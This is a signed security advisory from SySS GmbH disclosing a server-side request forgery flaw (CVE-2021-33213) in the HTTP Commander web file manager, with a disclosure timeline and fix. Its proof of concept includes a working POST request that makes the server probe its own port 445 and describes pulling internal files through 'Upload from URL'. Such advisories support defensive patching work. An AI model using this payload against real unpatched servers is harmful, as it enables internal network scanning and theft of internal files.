-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-027 
Product:                   HTTP Commander
Manufacturer:              Element-IT Software
Affected Version(s):       < 5.3.3.2020.11.16
Tested Version(s):         5.3.3.2020.11.16
Vulnerability Type:        Server-Side Request Forgery (CWE-918)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2021-05-05
Solution Date:             2021-05-13
Public Disclosure:         2021-07-14
CVE Reference:             CVE-2021-33213
Author of Advisory:        Tobias Jäger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

HTTP Commander is a web-based file manager.

The manufacturer describes the product as follows (see [1]):

"This software is intended for fast and easy integration of web site 
functionality with sharing and management of files and documents on a 
Windows server through a web browser over net. It's a web server-based 
file sharing and management solution – the best alternative to FTP, 
WebDav, Sharepoint, etc."

Due to a missing user input validation, the server is prone to server-side request 
forgery.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The function "Upload from URL" is vulnerable to server-side request 
forgery. 
HTTP and FTP resources can be requested in the name of the server. 
Therefore, resources from the internal network or the loopback interface 
of the server can be reached. 
Besides the access to internal resources, a port scan can also be 
performed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Download internal files:
Open the function "Upload" --> "From URL" and enter a URL. The server 
downloads the web page or file via HTTP or FTP to the selected folder (e.g. http://filer.internal/secret-passwordfile.txt).

Port scan:
To check whether port 445 of the server is open, one can send the 
following request:


POST /HTCOMNET/Handlers/UploadFromURLHandler.ashx HTTP/1.1
Host: 10.40.1.9
[...]
{"action":"UploadFromURL","method":"Upload","data":[{"url":"http://127.0.0.1:445","path":"Demo folder 1","name":"test","rename":true}],"type":"rpc","tid":4}

If port 445 is open, the resulting error reads: "The underlying 
connection was closed: An unexpected error occurred on a receive."
If port 445 is closed, the resulting error reads: "Unable to connect 
to the remote server."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to Version 5.3.5. The "Upload from URL" function can be disabled in the administrator panel. Deactivate the function. In new installations it is disabled by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-04-07: Vulnerability discovered
2021-05-05: Vulnerability reported to manufacturer
2021-05-13: Patch released by manufacturer
2021-07-14: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for HTTP Commander
    https://www.element-it.com/asp-net-explorer-browser/online-share/
    web-file-manager.aspx
[2] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Tobias Jäger of SySS GmbH.

E-Mail: tobias.jaeger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc
Key ID: 0xABF0CF2F4D0220F9
Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmDtVAEACgkQq/DPL00C
IPn3zQ//ZNCkuvND5BASwKEkRHooYSU6/wiQn8cGwLZFhnr0XH0PKfsKcq24vO+c
FXHDSOp5azCrFl/xONP0D1ELudZpMtXcroy3pJWSOPhwubeAFxkRb6rZuAJCVO/2
ezLxEd2wrkQ+6/FH+lGrn+/Q+j5/i2ooJ/e+FRwQhODtFDsEmGKxkvN8f+LyCwgC
VBW+x1OTY/xM+aJaDcIpYXGz5yiAR2OICKXyZxzGJhiG141Q4bJp6t6a57pwxH5s
i/wRM7L034232W4hb1VMZqRTprYMDNFHN8JgqzXcXWoOd+OOPLO0RjQ5J/ys2zW6
9A5RNmSPket5H/QYT1JDQ0miplPk/MnJo1u49l0cc4wBgzcpXFhr/7U9nQGBhiPV
L7frx2mNLaIDWqXjsq6b+4nCyn9LYR6aB+/xbwQ/xVpoqEXF6gtR3RgBS6UP79oM
uuGgXF5FR6tc+dpVtHBenrkiqPhABOniamfaSE1tyMrGLGydJqgJxE4IkJ74/5bl
ZwCaYaiqaTLvQFWqC/NvZpp8xjtlwTqMy1FKna36iBSZsKMKoRrGqIW2Y/CK/1dS
gzgQ60m+SNVbM4pHN86MI2r9wsUfy7NshUVrv3lh1mLrWR+dlVDAj+my0Sj+1cXj
ngezANB1Pvlb2oWOF8H4fjBq17M485W8Tnp9DgJZuIeaiG2t34g=
=Jcq3
-----END PGP SIGNATURE-----